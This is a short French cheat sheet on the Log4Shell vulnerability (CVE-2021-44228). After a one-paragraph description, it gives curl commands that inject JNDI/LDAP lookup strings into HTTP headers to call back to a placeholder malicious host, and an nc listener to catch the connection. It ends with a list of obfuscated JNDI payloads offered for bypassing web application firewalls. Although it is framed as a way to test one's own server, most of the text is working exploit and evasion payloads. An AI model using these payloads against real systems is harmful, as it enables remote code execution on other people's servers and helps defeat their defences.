
CVE-2021-44228
Le 5 décembre 2021, Apache a identifié une vulnérabilité (identifiée plus tard comme CVE-2021-44228) dans son service de journalisation Log4j, largement utilisé. Cette vulnérabilité, également connue sous le nom de Log4shell, permet aux attaquants de prendre le contrôle total des serveurs affectés en autorisant l'exécution de code à distance sans authentification si l'utilisateur exécute une application utilisant la bibliothèque de journalisation Java. Log4j est fortement intégré dans un large éventail de frameworks DevOps, de systèmes informatiques d'entreprise, de logiciels fournisseurs et de produits cloud.
Exécutez ce qui suit sur l'hôte distant malveillant pour vérifier si votre serveur est vulnérable à l'exploit Log4j
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
D'autres variantes impliquant une requête HTTP-POST peuvent être utilisées pour vérifier la vulnérabilité
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
Pour contourner le pare-feu d'application web
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}